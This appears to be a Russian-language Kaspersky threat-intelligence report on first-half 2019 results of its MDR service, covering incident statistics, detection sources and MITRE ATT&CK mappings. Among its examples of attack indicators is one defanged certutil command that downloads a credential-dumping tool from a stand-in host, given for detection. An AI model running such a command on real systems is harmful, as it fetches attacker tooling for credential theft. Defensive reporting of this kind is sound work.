Посты о SOC, TI и IR

Анализ результатов эксплуатации сервиса MDR, H1 2019

Содержание

  • Приоритеты инцидентов
  • Эффективность детектирующих технологий
  • Соответствие инцидентов техникам и тактикам MITRE ATT&CK на момент обнаружения
  • Эффективность MITRE ATT&CK при мониторинге на основе проактивного поиска угроз
  • Описание сервиса Kaspersky MDR
  • Первое полугодие 2019 года

     Скачать PDF-версию отчета

    Введение

    Данная публикация содержит результаты эксплуатации сервиса Managed Detection and Response (MDR, торговое название — Kaspersky Managed Protection) за первое полугодие 2019 года для различных организаций по всему миру. В рамках сервиса MDR используются подходы проактивного обнаружения угроз (cyber threat hunting), а также осуществляется первичное реагирование на инциденты безопасности. Краткое описание сервиса приведено в конце текущего документа.

    В сервис MDR входит обработка связанных с информационной безопасностью событий IT-инфраструктуры, что делает его похожим на работу центра по обеспечению безопасности (SOC — Security Operation Center). Основные отличия — типы событий, обнаруживаемых при проактивном поиске неизвестных угроз, опыт и уровень знаний специалистов в области поиска угроз, а также доступ к глобальной базе данных об угрозах (Threat Intelligence).

    Согласно пирамиде Дэвида Бьянко, наиболее сложным типом индикаторов атак (Indicator of Attacks, IoAs) являются TTP (тактики, техники, процедуры) атакующего. Эксперты «Лаборатории Касперского» специализируются на проактивном поиске угроз на основе TTP в рамках сервиса MDR. При этом итоговую оценку событий безопасности осуществляют аналитики, что позволяет существенно развить логику автоматического обнаружения, обеспечиваемую продуктами по защите конечных точек (Endpoint Protection Products, EPP), которые используются в качестве сенсоров во время эксплуатации сервиса.

    Процесс проактивного поиска угроз

    Распределение анализируемых организаций по отраслям и регионам

    В область анализа вошли результаты опытной эксплуатации сервиса MDR в первом полугодии 2019 года для более чем 50 организаций по всему миру, в том числе в государственных учреждениях, финансовых организациях, телекоммуникационных и IT-компаниях, промышленных организациях и других.

    Основная статистика

    Практически все алерты были сгенерированы в результате анализа событий от узлов IT-инфраструктуры, с использованием техник проактивного поиска угроз на основе детектирования TTP атакующего в качестве индикаторов атак (IoAs). Менее 2% из них в результате расследования оказались подтвержденными инцидентами.

    Такой низкий показатель конверсии проактивного поиска угроз обусловлен необходимостью обнаруживать сложные угрозы, трудно отличимые от легитимной активности: чем больше вредоносное поведение повторяет стандартные действия пользователей и работников IT-подразделений, тем выше количество ложных срабатываний и, как следствие, ниже итоговый показатель конверсии алертов в инциденты.

    Время обработки инцидента –

    это промежуток времени от появления алерта до окончания работы по инциденту со стороны Исполнителя.

    ~25 минут — среднее время обработки инцидента

    Следует отметить, что со стороны клиентов в дальнейшем могут проводиться дополнительные работы по расследованию инцидента, в том числе с применением методов компьютерной криминалистики – как правило, такие инциденты связаны со сложными угрозами и целевыми атаками.

    Примеры индикаторов атак (IoAs):

    • Запуск командной строки (или bat/PowerShell-скриптов) из браузера, офисного или серверного приложения (например, из SQL сервера или агента, nginx, JBoss, Tomcat, и др.)
    • Подозрительное использование утилиты certutil для загрузки файлов (пример команды: certutil -verifyctl -f -split https[:]//example.com/wce.exe)
    • Загрузка файлов при помощи BITS (Background Intelligent Transfer Service)
    • Исполнение команды whoami с привилегиями пользователя SYSTEM, и др.

    Идеи в основе детектирования TTP атакующего в качестве индикаторов атак:

    • Применимость для обнаружения действий потенциального злоумышленника на этапе пост-эксплуатации, в рамках которой достигаются цели атаки.
    • Детектирование стандартной, но подозрительной активности легитимных утилит: по этой причине процесс определения, является ли наблюдаемое поведение вредоносным, нельзя полностью автоматизировать.
    • Инструменты, используемые атакующими, не являются вредоносными в обычном понимании, но способ их применения представляет угрозу для инфраструктуры.

    Время обработки инцидента с учетом критичности

    Время обработки инцидента зависит от его критичности: чем сложнее выявленная угроза, тем больше времени в среднем требуется на ее расследование, восстановление затронутых систем и защиту от повторного возникновения или распространения внутри IT-инфраструктуры. Однако разброс незначителен.

    Приоритеты инцидентов

    Степень критичности инцидентов определялась на основе различных характеристик угрозы. К критериям оценки, в частности, относятся:

    • стадия атаки, на которой удалось обнаружить инцидент (в соответствии с методологией Cyber Kill Chain) и подробная информация об угрозе;
    • влияние угрозы на IT-инфраструктуру и бизнес-процессы и сложность восстановления затронутых систем и данных (с учетом информации от клиента).

    Краткое описание инцидентов, мер по восстановлению и требуемых действий со стороны клиента приведено в таблице ниже.

    Описание инцидента Уровень риска Рекомендуемая реакция на инцидент Действия со стороны клиента
    Следы целевых атак, неизвестные или сложные угрозы и вредоносная активность, не связанная с применением вредоносного программного обеспечения (ВПО). Высокий Расследование инцидента с использованием методов цифровой криминалистики Восстановление затронутых систем вручную техническими специалистами клиента
    Инициация процедуры реагирования на инцидент
    Новое ВПО (троянские программы, шифровальщики и другое), для которого возможно автоматизированное восстановление с помощью EPP.

    Связано с незначительным ущербом для затронутых систем.

    Средний Анализ ВПО Не требуются

    (восстановление затронутых систем осуществляется автоматически посредством EPP)

    Добавление в EPP логики обнаружения и обезвреживания
    Новое нежелательное ПО (рекламное ПО, утилиты удаленного администрирования и другое) – возможно автоматизированное восстановление с помощью EPP.

    Нет прямого ущерба для затронутых систем.

    Низкий Добавление в EPP логики обнаружения и обезвреживания

    Распределение инцидентов по уровню риска за весь анализируемый период и отдельно для каждого месяца

    Интересное замечание

    Большинство инцидентов соответствуют среднему и низкому уровню критичности и связаны с обнаружением угроз, после которых лечение и восстановление зараженных систем осуществляется продуктом для защиты конечных точек (EPP). Необходимо только добавить соответствующую детектирующую логику и обновить базы угроз на скомпрометированных системах. Это показывает, что современный продукт для защиты конечных точек (EPP) по-прежнему является эффективным средством защиты систем и их восстановления после компрометации. Однако для обнаружения новых неизвестных или сложных угроз требуется применение техник проактивного поиска и ручное детектирование.

    Эффективность детектирующих технологий

    Распределение инцидентов по источникам событий (сенсорам)

    Ключевые выводы

    • Около половины инцидентов было обнаружено с помощью анализа аномальной или подозрительной активности на узлах и метаданных, собранных с узлов IT-инфраструктуры, техниками проактивного обнаружения угроз на основе детектирования TTP атакующего в качестве индикаторов атак (IoAs). Это подтверждает эффективность использования техник проактивного поиска угроз для обнаружения сложных атак, не связанных с применением вредоносного ПО.
    • Около трети инцидентов было обнаружено в результате анализа подозрительных объектов с использованием технологий в составе Advanced Sandbox. Это может быть связано с вредоносными рассылками, которые относились к спамерским и фишинговым атакам, направленным на различные организации по всему миру. Подробная информация о спаме и фишинге в первой четверти 2019 года была опубликована 15 мая 2019 на Securelist.

    Распределение инцидентов по уровню риска для детектирующих технологий

    Соответствие инцидентов техникам и тактикам MITRE ATT&CK на момент обнаружения

    При анализе событий в IT-инфраструктуре методами проактивного поиска угроз на основе индикаторов атак (IoA) алертам и инцидентам присваиваются идентификаторы тактик и техник в соответствии с глобальной базой знаний MITRE ATT&CK.

    Распределение инцидентов по уровню риска для каждой тактики атакующего на момент обнаружения

    Тактики расположены по порядку этапов реализации угрозы в соответствии с методологией Cyber Kill Chain.

    Ключевые выводы

    • Представлены инциденты, соответствующие практически всем тактикам MITRE ATT&CK, что свидетельствует о возможности обнаружения атак на любой стадии развития.
    • Обнаружение инцидентов с различными тактиками MITRE ATT&CK показывает возможность выявления угроз после первичного проникновения (т. н. сценарий post-breach), когда злоумышленник уже получил доступ к сети жертвы и находится в процессе достижения целей атаки.
    • Статистика подчеркивает, насколько важно комбинировать обнаружение сценариев post-breach методами проактивного поиска угроз с классическим подходом по предотвращению проникновения в IT-инфраструктуру (превентивные меры безопасности, работающие в сценарии pre-breach). Чем больше угроза похожа на легитимную активность, тем меньше вероятность ее обнаружения до фактической компрометации, что часто имеет место в случае сложных атак.

    Интересные замечания

    • Наибольшее количество атак было обнаружено на стадиях Execution, Defense evasion, Lateral movement и Impact, которые можно считать самыми «шумными» тактиками. На этих этапах обнаружение атаки наиболее вероятно.
    • Значительное количество инцидентов, ассоциированных с тактикой Persistence, показывает важность обнаружения ее техник и их конкретных реализаций (процедур).

    Эффективность MITRE ATT&CK при мониторинге на основе проактивного поиска угроз

    Конверсия техники = # инцидентов,ассоциированных с техникой / # алертов,ассоциированных с техникой
    Чем выше конверсия техники, тем больше алертов являются инцидентами безопасности.

    Частота выявления техники среди алертов

    Большое количество алертов, ассоциированных с определенной техникой, связано с ложными срабатываниями IoA на легитимную активность со стороны пользователей и IT-подразделений.

    • Важно отличать, является ли поведение нормальным для конкретной IT-инфраструктуры.
    • Наличие базовой информации о том, что является нормальной и легитимной деятельностью в конкретной IT-инфраструктуре (эффективная ситуационная осведомленность), позволяет значительно снизить количество ложных срабатываний и повысить эффективность действий по обнаружению угроз

    Подробные статистические данные по техникам атакующего, включая телеметрию, необходимую для обнаружения соответствующих инцидентов безопасности, доступны по ссылке.

    Описание сервиса Kaspersky MDR

    Детектирующие технологии

    Компоненты автоматизированного обнаружения угроз:

    • Высокопроизводительный эмулятор угроз
    • Антивирусный движок
    • Анализатор целевых атак
    • Анализатор сетевого трафика (включает систему обнаружения вторжений)
    • Проверка YARA-правил
    Поведенческий анализ узлов IT-инфраструктуры осуществляется для метаданных, , с использованием:

    • техник проактивного поиска угроз на основе детектирования TTP атакующего в качестве индикаторов атак (IoA)
    • SIEM-правил автоматической корреляции событий
    Ручное обнаружение с использованием техник проактивного поиска угроз Запросы клиентов

    Процесс мониторинга

    Комбинация анализа сетевого трафика в режиме реального времени, динамического анализа эмулированных объектов и поведенческого анализа компонентов IT-инфраструктуры дает полное представление о событиях и действиях в инфраструктуре. Технологии машинного обучения для корреляции событий, полученных при помощи различных механизмов обнаружения, с ретроспективными данными и информацией из глобальной базы знаний об угрозах, а также использование технологий проактивного поиска угроз на основе индикаторов атак позволяют своевременно выявлять действия злоумышленников на всех этапах кибератак.

    Анализ результатов эксплуатации сервиса MDR, H1 2019

    Ваш e-mail не будет опубликован. Обязательные поля помечены *

     

    Отчеты

    StripedFly: двуликий и незаметный

    Разбираем фреймворк StripedFly для целевых атак, использовавший собственную версию эксплойта EternalBlue и успешно прикрывавшийся майнером.

    Азиатские APT-группировки: тактики, техники и процедуры

    Делимся с сообществом подходами, которые используют азиатские APT-группировки при взломе инфраструктуры, и подробной информацией о тактиках, техниках и процедурах (TTPs) злоумышленников, основанной на методологии MITRE ATT&CK.

    Как поймать «Триангуляцию»

    Эксперты «Лаборатории Касперского» смогли получить все этапы «Операции Триангуляция»: эксплойты нулевого дня для iOS, валидаторы, имплант TriangleDB и дополнительные модули.

    Подпишитесь на еженедельную рассылку

    Самая актуальная аналитика – в вашем почтовом ящике